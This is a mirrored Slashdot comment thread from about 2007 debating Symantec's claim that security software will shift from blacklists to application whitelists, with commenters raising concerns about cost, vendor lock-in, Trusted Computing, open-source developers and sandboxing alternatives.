Slashdot Mirror
Internet Security Moving Toward 'White List'
ehud42 writes "According to Symantec, 'Internet security is headed toward a major reversal in philosophy, where a 'white list' which allows only benevolent programs to run on a computer will replace the current 'black list' system' as described in an article on the CBC's site. The piece mentions some issues with fairness to whose program is 'safe' including a comment that judges need to be impartial to open source programs which can change quite rapidly. Would this work? The effort to maintain black lists is becoming so daunting that white lists may be an effective solution."
I'm all for this idea. We're counting Flash and Javascript as external programs too, right?
My Internet security philosophies have always been drop 'em all, let iptables sort 'em out!
They're using their grammar skills there.
I bet Vista gets on the whitelist. Whitelist RIP
Sounds to me more like a scheme to squeeze money out of software producers: "Give us teh money if ya wants yer program whilelisted."
New mod option wanted: -1 DrunkenRambling
Can someone send me a list of all IPv4 hosts which are not malicious? k thanx bye.
PS. please can you also send me an update whenever a new machine is compromised?
"It doesn't cost enough, and it makes too much sense."
A lot of the work my computer does for me happens via Google's Javascript. Will I have to whitelist it all over again every time the gmail implementation changes? If it's whitelisted by domain, then you still have to protect against cross-site scripting attacks somehow (all hail NoScript!)
The whole idea of a program being a quasi-static executable installed locally is starting to seem quaint.
Or is this going to really screw small-scale windows developers?
Seems to me to be a blatant attempt by the big boys to lock users into their software (or software from companies they have an arrangement with. Since the majority of users probably won't know how to disable this 'feature', they will have less choice, and therefore higher costs.
If we can put a man on the moon, why can't we shoot people for Apollo-related non-sequiturs?
Why? Because AV vendors want your money.
With a whitelist, the user clicks 'Accept' for everything he runs. Then he's protected until he installs something else.
Blacklists are great since they require yearly subscriptions.
isn't the flip side of this that now you're only allowed to run approved programs on your computer? Only IE is approved for web browsing, only MSN Live is approved for instant messaging. I know that I, for one, welcome our corporate overlords.
White lists have been proposed since the beginning of time - from web filtering to spam provention, and now to malware provention - and they all suffer from exactly the same problem, which is the fact that humans are not all identical clones of each other, and neither consume information in the same way, nor communicate with others in the same way.
Commodore 64, Loading up the dance floor!
This application has not been signed by Microsoft. Do you want to run this application? Yes/No
Are you sure you want to run this application? Yes/No
Are you really sure you want to run this application? Yes/No
I mean, if it's not Microsoft, it's not really "official", what makes you sure you should be running this application. You probably shouldn't. There's a nice Microsoft alternative which is "official". Wouldn't you like to download that instead? Yes/No
Deleted
anyone has ever suggested about computer security.
"A week in the lab saves an hour in the library"
Certificates were intended as a white list: you protect the submitted data and have certificate from a central authority that this is indeed the company the certificate says it is.
We know how this ended (certificates given left and right without proper verification).
Now they try again with new certificates, which are more expensive.
So that's about that part.
What about site filters. Whitelisting sites in security suites has got to be the dumbest idea I've heard in a long time. Last I checked there's like billions of pages out there, some of which safe and some not.
So now that we find it impossible to cover the entire subset of malicious pages, what do we do? Yes, we try to cover the even great subset of legal pages.
This will either end with many small harmless sites filtered out, or sites having to pay ransom to all security suite vendors out there to get whitelisted or something of a similar nature.
Not happening.
Take me for example. My open source software has a tiny number of users, being very specialised, and I'm not alone in having this class of software. We can't all be Apache developers. How will people like me get their program approved? Is it going to cost money? That's what I want to know.
I'd be interested in knowing how they deal with the fast release cycle of open source software (excluding mine, oh for a 48 hour day...).
I'm pretty keen on the whitelist idea though. If nothing else it'll make malware more inventive, they'll start imitating the fingerprints of validated software.
This is not a new idea, and many have talked about it before
Really, black lists were a bad idea from the start. Usually, the programs people want to run on a computer will remain fairly static, with perhaps a few changes when they update or find something online that looks interesting.
I'm sure they're must be some security software that uses whitlists already. Does anyone know of any free ones?
The Internet in general terms started moving in this direction years ago when people started to configure their firewalls to block everything and allow only what you need through. Previously it was reasonably common practise not to have a firewall at all - or if you did, all it did was block against things which were known to be malicious.
It is a lot of work to maintain any whitelist of any significant size. But the reason you do it is because it's a lot more work to maintain any blacklist of any significant size, and even more work still to clear up the mess after something slips the net.
I thnk residential ISPs will be the first - I'd be surprised if it was even possible to connect outside your own ISPs network. Email through their SMTP server, web access through their proxy, sucks if you want any other service your ISP doesn't provide. Some of the more expensive ISPs may set up some sort of "sign a disclaimer and we'll let you do anything, but we reserve the right to pull the plug if we see so much as a single malicious packet" system.
A whitelist of torrents would help the college I work at. It doesn't make sense to block torrenting per se, but they have no (legal) choice. As more and more big downloads become available via torrent, I hope we'll see the third-party security companies offer content filtering on this basis.
Once we whitelist all legit programs, we only have to blacklist the legit programs with injected code (via open source or assembler hacks) and we're done!
Amazing!
Or will security suites actually have to whitelist every single modification of the program? Will I be locked out of my HelloWorld.cpp program as soon as I compile it?
and folks are used to anti-virus software routinely blocking stuff that's not on the list, It'll be a real easy step for TPC hardware to start blocking execution of all non-whitelisted software, including all FOSS and anything else Microsoft choose not to sign. Microsoft's stranglehold will then be complete...
My home pc's Symantec firewall already has a whitelist. The first time an application tries to use the internet, it gets in the way to check. If the program's size/date changes, it does it again.
This makes the fix-compile-test-fix cycle on a simple net client application just a little harder, since each time I run a new build, the firewall comes up all over again. Not to mention that by the time I clean it out, the whitelist contains 30+ records of old builds, and the Ui to that list sucks dead donkeys through a straw.
Do this on a developer box for all apps that don't access the internet? Ouch. I can see it working for my uncle's email and web machine, maybe, kind-of.
My Karma: ran over your Dogma
StrawberryFrog
I would like to see an OS that maintains
several rings (concentric circles) into which programs can qualify
through increasingly rigourous standards and testing as they
get closer to the central core ring of software.
So essentially this OS would have a core ring of whitelisted and essential
programs. Just outside this would be a 2nd ring of whitelisted but
optional programs.
Then a ring of "grey listed" (reputationally vouched for, for both security
and usefulness and quality)
Followed by a "wild west" outer ring.
The OS would be designed so that programs in a more outer (less trusted,
and less essential) ring, could not have any access to the memory or disk
areas of more inner programs, and could only ever use the services of inner
programs through narrow public interfaces supervised by the OS.
Where are we going and why are we in a handbasket?
For instance, users in a corporate environment where setups are exactly defined and IT can check out in advance what works.
/. crowd: forget it, the whitelist wil annoy you more that it helps ;-)
For a private user with a mostly static set of application, it should still work but expect the occasional blocked program.
For developers and the rest of the
C - the footgun of programming languages
This leads to the conclusion that all other "security"-companies where either in bed with Sony, or that their "security"-products are utterly useless. I'm not sure, which is worse.
So why again should I give a rats ass about the opinion of those guys, when it comes to security?
ich bin der musikant
mit taschenrechner in der hand
kraftwerk
Exactly developers are prbly users that can run a machine that has very user configurable security parameters. Most pc users use email/web. The more advanced users us email/web/games so have a secure environment for email/web and an os that sandboxes the other apps on top of that so for the non developers have a configuration that is safe and hard for the user to circumvent then also have a developer edition.
...execute permissions and mandatory access control, yeah?
Now where have I seen this before...
Any vulnerability that allows dropping and launching unwanted executable code musts surely also also allow editing any whitelist. And all those vulnerbilities MUST be in existing white-listed software. This is shutting the door after the burglar is inside. It doesn't help.
From TFA: A "white list" would instead compile every known legitimate software program, including applications such as Microsoft Word and Adobe Acrobat, and add new ones as they are developed.
And what loops does a small software developer have to jump through to get Symantec to put his program on their white list?
Negative moral value of force outweighs the positive value of good intentions.
I think people should look at the big picture before taking this too seriously as a security measure: Programs only run on a system if they are either started by the end-user, or started by some other code on the system which has explicitly allowed that program run. Put another way, the current first line of defense is a 'white-list' like approach where processes only run when they are allowed to run.
The problem is that there are lots of people / large software monopolists in the world who don't know how to code well, and this creates security flaws which cause this authorised code to do things on behalf of other code, including possibly executing arbitrary.
This code is then theoretically built on top of a kernel which attempts to restrict what the code can do even if it is executed (of course, often there are flaws here too, and often the exploited code is run with more privileges than it should have, so the entire system can be compromised).
Virus scanners and other security software of this kind are supposed to provide an extra, reactive layer of defense on top of the existing proactive measure for anything which slips through the cracks. Suggesting that they be turned into another white-list is therefore not a logical suggestion, and implies that they are not being entirely honest:
* They might just want to create hype to utilise unsuspecting journalists to sell more of their products for them.
* Perhaps this is part of another Digital Restrictions Management style plot to take the decisions of what runs on computers from computer owners and give it to some central pseudo-authority so they can (mis)use the power for their own purposes.
X-Has-Sig: yes
I've been using whitelists for years now. Kerio Personal Firewall does it for me on Windows, but I'm sure most of the other firewalls also provide these features:
*) Whitelist ALL internet connections, mark networks as "safe" or make advanced rules for IP traffic
*) Stop any new program from running until approved. Checking signature, date, filesize and filename.
*) Various web-filters etc., but I don't use the pay-version so they disable themselves.
Of course, this won't stop ignorant users running "Britney screensavers" and what not, but should be secure enough for me.
Java apps for cellphones need to be signed to get access to certain onboard services. Last I checked this costs on the order of 500USD/year and I doubt that it involves any actual tests.
Even the owner of the phone can't sign applications which he himself wrote and wants to install on his own device. Eg on my Nokia 6230i I can allow my apps to access the memory card, but only after closing a dialog at each read/write-attempt. Only a signed application has unlimited read/write access, etc.
Although this is a relatively new area, there are already some experts emerging in the field. I came across these guys, who recently published this article on the subject. The article talks about the loss of control by IT of the desktop, and how peopel are now trying to use software to regain control.
AG
It won't just be "you're on the list, welcome to the party" but access to each resource will be given only if that particular access is whitelisted.
You already see this in some security programs, where program A is white-listed for ports 80 and 443, program B is listed for ports 20 and 21, etc. etc. etc.
Eventually, this will be locked down even more. Program A may be whitelisted for port 80, but only for the purposes of self-updating or reporting bugs to its manufacturer, and only to a short list of domain-names or IP addresses.
Within a web browser, not only will add-ons like flash and Java have their own restrictions, each add-on will have its own restriction. Java implements a version this already, allowing applets: it's supposed to let talk to home base but not much more.
I also see the rise of ordinary applications running in a full or lightweight VM, with applications in different VMs talking to each other over a virtual network rather than through shared memory or shared files. Rogue or compromised applications in a VM will be limited to what they can do, much like a chroot'd or BSD-jailed application, only more so.
Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
Would this work? The effort to maintain black lists is becoming so daunting that white lists may be an effective solution.
You see, a white list would be bigger than the black list. But how come then a black list is daunting to create, and a white isn't?
Simple, they'll charge the legal software vendors to be white listed.
It's funny, laugh.. Hmm, no one is laughing.
Being a gatekeeper in a whitelist scheme is a great business opportunity:
After all, businesses would be willing to pay to get their products into said whitelist, while one hardly expects virus makers to pay for getting their creations into a blacklist.
Of course, i'm sure the Symantec guys are naturally not at all thinking of all those extra $$$
I just released version 421 of a scientific simulation model The model is mostly of interest to our own students and research partners, but occasionally a unrelated ph.d. student might try it out. So we distribute it from our home page. If any single version is downloaded by five people, that is unusually popular.
Should each version of this program be "judged" in order for others to run it?
There are zillions of these kinds of highly specialized scientific programs, and other branches have their own ad-hoc program with narrow but high impact utility. Vertical markets.
It seems to me that thes4e white lists must come with user specified exceptions. Which basically means "allow this program to run" pop-ups. Which we already have in abundance in Vista, and thus are being conditioned to press "yes" for.
So nothing is really gained by white lists.
And always been a good idea, but whitelists should be personal, with distributed advice and combined with greylisting and blacklisting algorithms. That is to say, I want the OS, when it installs, to have a few things in userland whitelisted, but only when I install something, can I add to the whitelist. You may throw in a bit of internet opinion, as in - 70% of users think that this program is Ok and 0% of users think that this program is malware, or sandbox this greylisted program until I whitelist it in a month's time. Same for email really. I want whitelisted 'from' addresses only. Plus any greylisted stuff that consists of one line only. And no blacklisted stuff (of course).
Religion is what happens when nature strikes and groupthink goes wrong.
Indeed, the only possible "success" from the whitelist idea is that the Internet morphs into television (shudder).
Q: Where has the Internet failed?
A: Its main proponents and enthusiasts ignored Drivers' Ed for the info-superhighway. They didn't teach people how to use web browser and email programs, didn't show how to read a URL and pay attention to the protocol and domain, nor instill the habit of mousing-over links to see where they go beforehand. Teaching people about the padlock symbol should have also included how to deal with SSL certificate alerts.
The result of this neglect is that people cannot recognize authenticity on the Internet, so the value of the Internet's "currency" is spoiling. Imagine if people weren't clued-in on how to authenticate a $20 bill: Over time only certain government and corporate entities would be trusted to handle currency to prevent spoiling by counterfeiters.
Our job as Internet cognoscenti is to keep correcting the people around you on the right way to use Web and email. Granted, this is not a cure-all given the other major factor here (Windows malware) but its several steps in the right direction. This stuff is not hard.
The alternative is an Internet-II re-worked around big corporations and government sites through a whitelist enforced by Trusted Computing remote attestation. Don't think they won't be opportunistic enough to scare the public into that corner.
According to Symantic, *Windows system* security is headed towards a major reversal in philosophy, where a "white list" managed by us, Symantec, will allow only benevolent programs that registered with us (for a small, very reasonable fee. No, really!) to run.
They have to find a new way to make money now that Vista broke their existing business model.
Every expression is true, for a given value of 'true'
Yes, because when I think "desktop application", I think "the file format parsers in this application are totally not vulnerable to complete and utter compromise, the effect of which would be the evasion of software restriction policies."
There is only one problem with this approach: once you install a white list, you no longer have a general computing device (short: computer), but an embedded device. You are limited in what you can do by what is on the list.
Developers will be the first to notice: you can still write and compile a program, but you cannot test it. But the typical user will also be affected: what about the useful firefox extension you like? Bummer, not on the list. Want to use facebook? Sorry, the javascript in the new version is not approved.
The white list is a pretty futile anyway, because you can program on several levels. Javascript is only an example: what if the browser is approved, but your javascript code does nasty things? Or what about a heap overflow in the browser? Suddenly you are running custom code, but how is the white list going to notice this?
1: What kind of person even remotely interesting in anything "Internet Security" would even consider dreaming about considering taking Symantec seriously?
2: Didn't we have this discussion not too long ago except the "List" would've been administered by MSFT (&co), called TCPA (then Palladium then NGSCB then OMGWTFBBQ) and be a little bit more "hardware-assisted"? (For anti-microsoft-fanboy coverage, check out AgainstTCPA, for msft coverage try Microsoft, Wikipedia has some rather neutral insights)
Because, you know, if a software badly parses a file format allowing code injection, it won't be safe anymore...
In a real business scenario, scripts, programs and macros are created to solve day to day problems. How do these get on the WhiteList? For the developers trying to test their work this becomes a true nightmare. At what point do you draw the line? VB 'macros' inside of Excel? Perl scripts? Batch/cmd files? Moving electrons?
Anyway, as pointed out in some other posts, the entire network would be at risk if a trusted application or host machine that are WhiteListed get infected or compromised.
You may be more right than some probably realize. See, whitelisting is essentially all that "trusting computing" was about.
Yes, "trusted computing" had all that DRM stuff and crypto signatures and all components authenticating themselves and their drivers, but essentially that's what you need to have a bullet-proof whitelist.
- E.g., if you don't have a strong hash to be sure that it indeed is the program you think you're running, and it's an untampered executable, then you don't really know what you're running. (E.g., if you were to do it just by name, and you allow, say, "WoW.exe", then you'll also run a virus attachment called "WoW.exe" just as cheerfully.)
- E.g., if you don't make the system startup itself bullet-proof, people will use spoof drivers and whatnot to compromise that security
So basically we're essentially back to the same Palladium shit that we ranted and raved against as the great Satan. It's what MS wanted in Vista in the first place, but apparently realized grudgingly that noone else wanted. And _of_ _course_ Vista would be on the list. In fact, better than that, Vista was supposed to be the one enforcing it. (Which, if you think about it, is pretty much needed. If the OS doesn't do it, and doesn't double-check its startup and components at that, any other link down the chain is not guaranteed to be guaranteed enough to be the uncompromised.)
So now it's snuck back under the same claim that you need it to protect you from the evil hackers. Right.
Well, the problems are the same any way anyone wants to slice it. E.g.,
- it essentially discourages running stuff you compiled yourself. (Just changing the options you compile a kernel with, for example, is enough to change the hash, if the hash is any good. So essentially the only safe thing a "trusted computing" system should conclude there is that the system itself has been tampered with and is no longer secure or trustable.)
- it places an undue burden on small time developpers and hobbyists. I know if I was distributing a small utility on sourceforge, I'd be annoyed if I had to re-certify it every time I refactor something or fix some obscure bug. Doubly so if it costs anything to get it certified, which would likely be the case if a commercial entity is doing it. Getting it virus scanned, ran through some automated heuristics, hashed, and put on the list, can take some time and infrastructure and a paid employees time costs money.
And, frankly, even if it was something as trivial as 10$, why would I pay it for something that makes me no money? It'd be like ROI except without the R. And if you want it thoroughly dissected and certified that it 100% can't possibly be a virus, then it'll cost a heck of a lot more than that.
- it can be used to shaft you the other way around too. A program can authenticate the system it runs on, and some might even need to. (E.g., I sure hope an anti-virus utility pipes up loudly if it thinks it runs on a system where the OS itself has been compromised. E.g., I sure hope a banking applet pipes up loudly if it runs in a browser that's been compromised.) So there's nothing to keep someone from making a program that refuses to run in Wine or a flash applet that refuses to work in Mozilla.
And if you think noone other than MS would ever do that, think again. There was this recent story even on Slashdot about webmasters who explicitly don't want Mozilla users because they block their ads.
Etc.
A polar bear is a cartesian bear after a coordinate transform.
One thing I always liked about the FOSS/linux world is their package management. e.g. All I have to know is that I trust certain repository maintained by OS developer/enthusiasts. As long as I am pulling apps from them (apt-get, emerge, yum...whatever), I know I am not getting screwed over (Should also check MD5 or something, but usually quite automatic). If I have to use something very special that's not in the repository, then I do my own research (yeah, I know, most user can't be bothered with that).
How is this not essentially the same thing except that Symantec wants to be the middle man and charge everybody for it. So how's this idea: instead of a white/grey/black list maintained by some large Corporation, have some sort of app management program that, whenever an unknown executable runs, make a checksum or hash or whatever, and check against some wiki-ish site that user rate program for trustiness. Surely malware writer can run some bot that boost their rating, but it seems like a technically solvable problem.
Just some though before some large corporation asks me to surrender control of my computer to them.
The only possible interpretation of any research whatever in the 'social sciences' is: some do, some don't
I can see some immediate problems with trusting a list that says "you can only run these known safe programs":
Usage: km/h for speed (kilometers per hour); kph for very slow impulses (kilopond hours).
...That if people could start using more secure OS's, meaning more of the necessary apps gets developed for said OS's, white, black, grey etc listing wouldn't be needed. I think all PC's should have a sensor, which senses if a certain user is going to do something stupid, then knock said user out with a blunt (and semi soft) instrument, pick it self up and run away. The bane of PC security is users doing stupid things. (This is coming from a guy who just have had to spend a day cleaning out RavMon from a bunch of Windows PC's because some schmuck tried to download some games over Limewire and thought Hitman: Bloodmoney really only is 5mb, somebody have to teach people how to pirate properly, since improper pirating spreads viruses)
Frankly, I'm not all for this idea. It creates a cumbersome and abusable solution to something that was solved better already.
E.g., whatever happened to running something in a sandbox, ffs? You can go as far as running something untrusted (e.g., a plugin, ActiveX control, etc) in a virtual box, but even a chroot jail is a good start. It _is_ possible to isolate something to the point where it can't do any harm at all, and can't touch anything except itself. It's also possible to nice it to the point where it only runs when nothing else wants to, so it can't DOS your system that way.
So why doesn't anyone do just that already? E.g., MS could have fixed their own ActiveX crap that way ages ago. Instead we got this baroque, but fundamentally broken, model where you get to decide (or have decided for you based on zones) whether something can't run at all, or can run with full rights as an executable. Except if a malicious one slipped through the cracks, it's still a full executable running on your machine.
Heck, even Java is essentially the wrong way about it as a browser plugin. It tried to implement itself some restrictions which belong in the OS or browser itself, and if the JVM itself is compromised (there _have_ been a couple of JVM vulnerabilities), it can do anything. Kudos to Sun for trying that, but it's a workaround essentially. It shouldn't have been the JVM which does that, it should have been the OS and browser.
Whitelisting is just an extra step in that wrong direction, essentially. Instead of making sure that a malicious thing in the browser can't touch anything else, we're one step further in the baroque, fragile and monumentally work-intensive direction of determining which of them should be allowed. Except again, if something slipped through the cracks, you'll still get screwed so hard you'll walk bow-legged for a week.
Am I the only one who finds that dumb?
A polar bear is a cartesian bear after a coordinate transform.
The whole idea of a black list really doesn't work on large networks like the internet there's probably thousands of pc's being compromised and making a new not infected software is child's play. It's probably easier and less work to keep a white list instead... if its actually useful all together is another thing...
It's already like this in the mobile environment, and it's a terrible pain for developers.
When making apps in Java/J2ME or Symbian (e.g. for Nokia nSeries), you need to have the client signed by a third party in order to use native resources like memory efficiently. While the signing process it not technically the same as a white list, is has similar consequences: You are hindered in successfully demonstrating your software for potential customers until some unknown person has expressed his subjective opinion about it.
I know cause we make such an application right now, and during development we're screwed, as we can't get around these limitations even on our development devices. It's no good.
IF this idea catches on, real world developers need to test the god damn system before they enforce it on people.
As I've mentioned before, what would help would be sandbox templates.
;).
Basically a program requests the template sandbox it'd like to run in, and it runs in that sort of sandbox if the user has approved that before (or approves it now), or the program is signed by User Trusted Vendor X to run in that template.
Then even if the program is inherently evil or is exploited by some "save game" or other stuff, the program still can't break out of its sandbox.
In contrast, the problem with plain whitelisting methods, is if whitelisted programs like Mozilla/IE get exploited, they get to access the users files, eavesdrop/keylog etc. Cynically, whitelisting of programs is just good for extending monopolies/oligopolies and control, and doesn't do that much for security.
And even worse are Vista UAC or other "Are you sure you want to allow this" schemes which effectively require the user to solve the "halting problem", except that instead of "will this program halt?", it's "will this program do something evil?". AFAIK the halting problem isn't solved, and so it's not reasonable to expect "Aunt May" to solve it.
It is more reasonable to train "Aunt May" to not click "Yes" when she sees "'Cute Frog Game' requests Full System Install Privileges allow Y/N" with the usual exclamation marks and red/striped backgrounds and scary warnings. And to only click "Yes" for "'Cute Frog Game' requests Guest Game privileges". In which case "Cute Frog Game" does not have access to the microphone, no network, and can only read stuff from a few places and write to even fewer places.
All this is not easy to do - because programs need read access to libs/DLLs etc, and you need to standardize file layouts, device, network access etc, and create a reasonable and manageable set of templates (custom templates should be allowed - esp templates signed by a trusted party, but if everything is custom it breaks down).
But the technology is already there - e.g. SELinux, AppArmor, but it needs more user friendly wrapping, cooperation from GUI/desktop, standards etc.
And it is possible - Microsoft could do it - they already have stuff like Local Settings and so on. Apple could too - they moved people from PPC to x86 etc.
I'm too lazy to go to the details on how it could work so please fill in the rest of the blanks intelligently yourselves
Almost every program installed on this system is already in a whitelist of software known as a "repository" -- collections of software where (typically) the source code is available to all, tested, compiled and cryptographically signed so that I can be fairly confident the packages I install have not been tampered with. There are only five other packages I've installed manually, and even three of those are open-source and probably available from a repository somewhere.
Nice to see that the Windows world is trying to catch up.
455fe10422ca29c4933f95052b792ab2
My white list doesn't include windows, which makes all of this go away !!
a) I see this as a great way of stifling innovation (while you may get a temporary reprieve from malware, until the malware begins breaking into your programs [e.g. via word-macros,... - or would we need to get macros added to the whitelist, too?])...
b) I see that this may end up in taxing innovation as well (if the whitelist was free, it could be fairly easily knocked out by everyone who hates it writing some small 'hello world' program and requesting their program to be put on the whitelist. (if this should be restricted to network-only programs, make your own hello world translate the string 'hello world' on the fly via google's translation service). This alone would force whoever organizes the whitelist to charge for any examination, if only to prevent themselves getting completely swamped in applications.
c) What are the political ramifications of this? Would you have one place in every country adding to the same global whitelist; or just one global whitelist? If every country has a place, how do you keep out corruption as a factor (say, bribing someone to accept a malicious program on the whitelist).... If there is only ONE, how do you make sure that this doesn't get abused for political purposes (i.e. we don't want an office program developed in China; they can use MS Office, which incidentally is on the list already)?
You think spam, virii and trojans are bad? This will be worse...
I hate having stuff run on my box that I don't know about -- even benign or useful stuff. With Noscript I love having fine control over all the crap that sites want to run. I have gotten used to some sites needing to have components whitelisted before they work properly. I also love it that I can stop annoying flash from remote servers (This is why I downloaded NoScript). True, NoScript has given my wife headaches when it mysteriously (to her) blocks functionality, but I suggested she use Explorer instead of Firefox. She only goes to a few whitelisted sites anyway. If tools like Noscript start to become standard then I am all for it. Is this world of increasingly sophisticated Phishers and other creepy attacks NoScript makes me happy.
"No fear. No envy. No meanness." Liam Clancy
-
Let's invent a new operating system where processes in regular user space cannot alter resources belonging to other users (unless access is specifically granted.)
-
Let's make this operating system so that the need for super-user access is limited.
-
Let's have a generic toolset with this operating system by which the need to download trivial programs is minimized. (We must think of editors, file manipulation and systems management tools.)
-
Let's invent a runtime environment so that foreign applications can run locally with very restricted access to local resources.
-
Let's promote the notion that you should know what you do before doing it. And let's do this in clear and understandable language.
As MS clearly never thought of this, I should patent this idea and make huge loads of money.On the other hand, I have to do my hair and hence I have to set priorities and patent applications come after the hair.
And maybe, just maybe, someone genius thought of these things long before I did.
I hadn't the slightest objection to his spending his time planning massacres for the bourgeoisie... (P.G. Wodehouse)
The problem with a distributed solution is that the bad guys have control of multi-thousand machine botnets who will all say $BADAPP is the bee's knees and safe to run.
One CPU cycle wasted on digital restrictions management is ONE TOO MANY.
I'd like to expand on my first post by pointing out a few ways for fighting malware that are the most freedom-friendly, encouraging users to make responsible decisions. These depend on OS vendors employing sane UI policies:
Do not engage in filename-mangling! If a file is named "apicture.jpg.exe" then it MUST be displayed that way and must not undergo any automatic alteration (falsification) that, for instance, makes an executable appear as data.
Additionally, all executable files are shown with a red warning flag whenever that filename is displayed by the desktop, file manager or file dialog. This is important, as Windows will execute files ending in ".com" and this suffix is a part of most websites the user trusts; clicking on a "monster.com" file is natural so another indicator is necessary to cut down on trojans.
Make web site scripting purely an opt-in affair by default. This goes for anything else the html engine is used for, like chat clients.
No more "Open this file" option in download dialogs. Period. If the user cannot manage opening the file themselves from the regular UI, then hopefully they will get stuck and sign up for an introductory computer class.
All true believers break their eggs at the convenient end.
And did you exchange a walk on part in the war for a lead role in a cage? - Pink Floyd.
I'm forced to use "Cisco Security Agent" by Corp which blocked most programs that are not white listed and also limit what user can white list them selfs. It also "meant" to block Virus and Malware but it not very good at that....
Gee, this scheme will work just about as well as it did on the XBox.
09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0
45 5F E1 04 22 CA 29 C4 93 3F 95 05 2B 79 2A B2
Remember SyGate and those other firewalls, where you would "whitelist" traffic.
Every geek would encourage non-geeks to install a firewall (the non-geeks knew it would protect them, after banging it in, but couldn't grasp the concept.)
However, the non-geek would "whitelist" everything because he got conditioned into thinking "I can't do what I try to do, until I click 'yes - remember'" and didn't understand what an "incomming request on port 1234" ment anyway.
I think we can keep recursing like this until someone returns 1
Whitelist sites will get Blacklisted... ... All that needs to happen is for some white listed computer to get taken over and become of a bot-net/spam network. Then valid email will be sent from a white list PC and accepted everywhere.
Considering the recent Storm Worm with an estimated 1 to 50 Million PCs as part of its bot-net, surely a few of those PCs would have been on a white-list somewhere.
Adeptus
No trees were killed in the making of this post; however, many trillions of electrons were horribly inconvenienced.
"According to Symantec, 'Internet security is headed toward a major reversal in philosophy, where a 'white list' which allows only benevolent programs to run on a computer"
...
Well DOH, is this the best that the security 'innovators' have come up with in 2007. How about a module in embedded hardware that runs a checksum on every executable and disables it if it fails the pass. It would have an install mode and a run mode. Only executables that are installed can be run. The original DOS executable had a file for just such a purpose.
Incidentally Marcus J. Ranum said this a long time ago in a reference to Enumerating Badness, nice of Symantec to have caught up
davecb5620@gmail.com
Because in practice almost all XP users run as admin, as do almost all Vista users.
Kinda negates permissions. XP as admin is just a pretty DOS. But hey, I know of Linux and Mac users who can't be bothered with limited user.
... and the day will come that your 'global whitelist' (which, if you thoroughly follow through boils down to the OS) has to be 'approved' (as it fits, by whitehouse.gov, not .org).
CC.
TaijiQuan (Huang, 5 loosenings)
and the "white list" philosophy is what Linux distributions generally use.
Specifically, I use Fedora. There are the standard repositories that hold software, and the repository is under peer review. I use some other repositories (livna, for example), and I trust those repositories as well.
(almost) All software comes from these repositories, which are, in essence white listed. Since I am a programmer, I install some things from source (tcc, redhat source navigator) that are not in the repositories, but those are white listed as well, and I have to keep up with security advisories on those pieces of software myself.
In a nutshell, all software I use is white listed by sites that I trust, and I don't install anything else.
But then, I am a Linux user, so I guess I am a bit of an early adopter.
Just another "Cubible(sic) Joe" 2 17 3061
I agree with what I believe you are saying.
However, the problem lies not in those who understand security, but in those who control budgets and make the policy decisions. I am sure I am not the only security person who has had his or her technically (and financially) sound recommendation overturned by a non-technical manager.
The people we need to consider here are those who make business policy decisions. Remember, these are the same people who insist on everything being Microsoft and who believe everything that Gartner's analysts say.
Everyone seems stuck in the context of web browsers for some reason...In the Microsoft world, at least, IE7+Vista actually has a pretty secure design. A whitelist isn't going to be intended to stop flaws in the software--rather, it's intended to manage computer-related problems due to flaws in the human brain.
Unfortunately, it's just not workable without a pretty big shift in the way we think about computers. They have to stop being "general purpose" devices. We're talking about going to a cross between WebTV and personal computers, here, and that's a scary thought.
I still think that a license to use the Internet is what's in order. Remove a person's license, and if they still cause problems on the network, fine them.
Isn't this similar to what many linux systems do with their packages and synaptic?
Form an official international non-profit organization or something of the sort (something like the IEEE, ISO, organizations etc.) where you would submit the source code of your software before you release it (same goes for newer versions). The organization will be bound by a confidentiality agreement if the project is not open source, so that it doesn't reveal the code to any third parties. In that case, you may also have to pay a small fee to keep the organization going, but it should be something even small companies can afford.
So the people of the organization get your code, decide if it is malicious or not, and if not, add it to the whitelist so that any computer may run it. Maybe one should have the right to appeal in case of ambiguous cases. The list is open for all computers to access through the internet, so that all PCs "know" what is allowed and what isn't.
How do you like that?
The problem with your idea is there is no whitelist committee where MS can help establish and exert their influence to make sure their products get on the lists and any competitive software does not (or takes a whole lot longer to do so). Because we all know Windows MUST have IE embedded for better security.
:-)
Anyway if they fixed the OS the way you suggested how can MS tout having improved security version after version.
"Enjoy what you're doing! If it becomes drudgery, you're doing it wrong!" - Jim Butterfield
Yeah, you teach him how to set up a chroot jail for his browser is how.
Please stop stalking me, bro.
In other words, I want my content to support like minded quality content, not the legal or illegal versions "quick make-a-buck and to hell with ethics" crowd.
...Open Source isn't the only answer -- but it's almost always a better value than the alternatives...
GEEK: It sets up the chroot jail or it gets the hose.
N00B: [sobbing hysterically]
GEEK:Yes, it will, Precious, won't it? It will get the hose!
N00B: Okay... okay... okay. Mister, if you let me go, I won't - I won't press charges I promise. See, my mom is a real important woman... I guess you already know that.
GEEK: Now it places the browser in the chroot jail.
N00B: Please! Please I wanna go home! I wanna go home please!
GEEK: It places the browser in the chroot jail.
N00B: I wanna see my mommy! Please I wanna see my...
GEEK: Put the fucking browser in the jail!
Please stop stalking me, bro.
Antivirus companies will find they no longer have to review software, they can just charge a fee for "express certification", and make the regular process low and cumbersome. This will greatly reduce the costs, and - most importantly - the technical expertise needed to develop antivirus software.
Hackers will find out that they can now pay for certification, all they need is to use one of the 8500 identities and credit cards they compromised last week to pay for their next trojan. This will, in turn, require them to steal more credit cards and identities.
Open Source developers will find it expensive, slow and difficult to get their programs certified. There will be far fewer open source programs developed.
I'll bet Microsoft loves this solution.
The real solution is a better O/S design. Microsoft refuses to do this. Running "all programs as root" by default - should qualify for criminal negligence on their part. There was a site called "ddos-ca.org" that was organizing a class action lawsuit against Microsoft for failing to provide security. Within 2 months of a public interview on Canadian TV, Microsoft shipped a "Windows Firewall" patch to the O/S.
Impartial to open source apps! Right!
A whitelist system like this will no doubt need to be run by an "authority," a.k.a. the manufacturers and distributors and will amount to granting total control over what programs can be run and what tasks can be performed to those companies. Permitting end users to whitelist programs will certainly not achieve the desired security results, as, whatever restrictions, warnings and checks we perform, we'll still face the "just click yes" problems associated with running dangerous content in web browsers.
Instead, we'll see a situation like that in the mobile phone industry which has begun requiring centralized (and slow and expensive) reviews of every version of a program that will run on a phone (see the latest Symbian release's signing program which doesn't even permit the user to authorize use of GPS data unless approved by the service provider and manufacturer). Far from being fair to open source, this would cripple the ability of individuals to code their own programs and remove any notion that one's own computer is meant to do whatever one tells it to do.
